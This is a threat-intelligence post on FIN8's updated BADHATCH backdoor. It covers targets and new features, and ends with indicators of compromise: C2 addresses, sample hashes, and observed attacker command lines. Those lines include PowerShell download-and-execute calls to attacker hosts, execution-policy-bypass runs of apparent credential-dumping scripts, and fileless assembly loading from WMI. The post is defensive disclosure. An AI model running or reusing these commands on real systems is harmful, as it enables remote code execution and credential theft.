FIN8 Group Returns with New and Improved BADHATCH Toolkit

Saturday, March 13th, 2021 | , ,

Emerging in January of 2016, FIN8, a new financially motivated threat actor, made its entrance to the hacker scene. The s group is known to have used a diverse array of techniques, from spear-phishing to zero-day exploits in Windows, to infect retail, hospitality and entertainment companies and steal payment card data from POS systems.

The FIN8 group uses a fully featured backdoor called BADHATCH, first discovered in 2019. Researchers at Bitdefender have been closely monitoring the development of the BADHATCH backdoor since its discovery and have found that the newly deployed versions can ensure persistence, gather information about the victim’s network and allow lateral movement to infect more computers to then find more information worth stealing.

Since 2019, FIN8 has been constantly improving malware capabilities with new features such as screen capturing, proxy tunneling, fileless execution and more.

A signature move of the FIN8 group is the use of long breaks between campaigns to improve TTPs and increase their rate of success. Researchers have now discovered a series of improvements to their BADHATCH tool, which allow for improved persistence and data collection. A key improvement is the use of TLS encryption to conceal PowerShell commands and evade security monitoring.

Over the past year, researchers have identified that FIN8 has targeted victims in the United States, Canada, South Africa, Puerto Rico, Panama, and Italy, while targeting industries such as insurance, retail, technology, and chemicals.

IOCs

  • C&C
    • 192[.]52[.]167[.]199
    • 104[.]168[.]145[.]204
    • us-west[.]com
  • Servers for Distributing PowerShell Scripts
    • https://192-129-189-73[.]sslip[.]io/yo
    • https://192-129-189-73[.]sslip[.]io/80
    • https://198-46-140-52.sslip[.]io/xxx
    • 198[.]46[.]140[.]52
    • 192[.]129[.]189[.]73
  • BADHATCH Samples
    • a9dcdf037d39e88bc71ae844971e63aa78379d50ce47e8aaad0e4b1baf6c7040
    • da89d50220da32060ef38546d1160162637ff72e3c3fa2268febca9331eb5adc
    • 8637b972d5db5c4cb152b0a42f4866c9b574e68023b7620911af8e3d472d4701
    • 5634140992891d2382fa103031b96023b75470ecd1bf0cf88006a45e63ef41bc
    • ee188b38b4ab978e71a84fe20b9609d888832f2f543a5ec6aa112d61450986d1
    • 6f0f702fc0f0a5420a1dbaf1aa88b13b557bebc2631a4157b8e026d80f7651b2
    • 32863daa615afbb3e90e3dad35ad47199050333a2aaed57e5065131344206fe1
    • e058280f4b15c1be6488049e0bdba555f1baf42e139b7251d6b2c230e28e0aef
    • aa07611ce06d7482c1d2d2f26c8721d6833718abd72360b81598bc2935811dcb
    • cb28e7980ba2f1c718cd96401b9290719e7748ab9987abcf9ad9e376f6f60b37
  • Command Lines
    • powershell -nop -ep bypass -c C:\\Windows\\Temp\\sh-tmp.ps1 sys
    • powershell.exe -nop -ep bypass -c c:\\windows\\temp\\mim.ps1
    • 786c34ba841a259d0c8945503d0b6d89c46e9245
    • powershell.exe -nop -ep bypass -c c:\\windows\\temp\\mimi.ps1
    • 786c34ba841a259d0c8945503d0b6d89c46e9245
    • powershell.exe -nop -ep bypass -c c:\\windows\\temp\\m.ps1
    • f9eef8b27ff68f41a8eb0b8739370640
    • powershell.exe -nop -ep bypass -c c:\\Windows\\temp\\mldr2.ps1
    • f9eef8b27ff68f41a8eb0b8739370640
    • powershell.exe -nop -ep bypass -c C:\\Windows\\Temp\\sh.ps1 sys
    • powershell.exe -nop $pa=’sys’;iex (New-Object System.Net.WebClient).
    • DownloadString(‘https://192-129-189-73.sslip[.]io/80’)
    • powershell.exe -nop $pa=’sys’;iex (New-Object System.Net.WebClient).
    • DownloadString(‘https://192-129-189-73.sslip[.]io/yo’)
    • powershell.exe -nop $pa=’sys’;iex (New-Object System.Net.WebClient).
    • DownloadString(‘https://198-46-140-52.sslip[.]io/xxx’)
    • powershell.exe -nop -c [System.Reflection.Assembly]::Load([System.
    • Convert]::FromBase64String(([WmiClass] ‘root\cimv2:Win32_Base64Class’).Properties[‘Prop’].
    • Value));[utYEb.a6Kxxs]::Ye5d(10)
    • powershell.exe -nop -c [System.Reflection.Assembly]::Load([System.
    • Convert]::FromBase64String(([WmiClass] ‘root\\cimv2:Win32_Base64Class’).Properties[‘Prop’].
    • Value));[Inrcp6.ylN8K]::ATka(10)
    • powershell.exe -nop -c [System.Reflection.Assembly]::Load([System.
    • Convert]::FromBase64String(([WmiClass] ‘root\\cimv2:Win32_Base64Class’).Properties[‘Prop’].
    • Value));[m5cW.i6guL]::ZOoS(10)
  • BADHATCH Deployment Scripts
    • dbb3a665f9460343eb7625f8625815179e63aaa83f91b9283a296142ec4b2bbb
    • c328b3714df8400f4d4c071edb1f6d3b82d42488ebf8d9437c300bec9108755b
    • 981ecfc67d7192f0e82f3f8042d7c26c78396a3a62e5e34c717db31aee566eca
    • 428cf5d05d9c3d4f7601ff785a175c1d86a90fe060a1f33976b363e8f9530a88
    • 355d200eebf9d9102d5f2ba0c8a576948aef43640ae8f0eedf101e0e881be0b0

Further Reading

Share this:

Previous
View All
Next

Not Sure Where to Start?

What is Cybersecurity ?
How Do Cyber Attacks Happen ?
How Does Atlas Work ?
Who is Atlas ?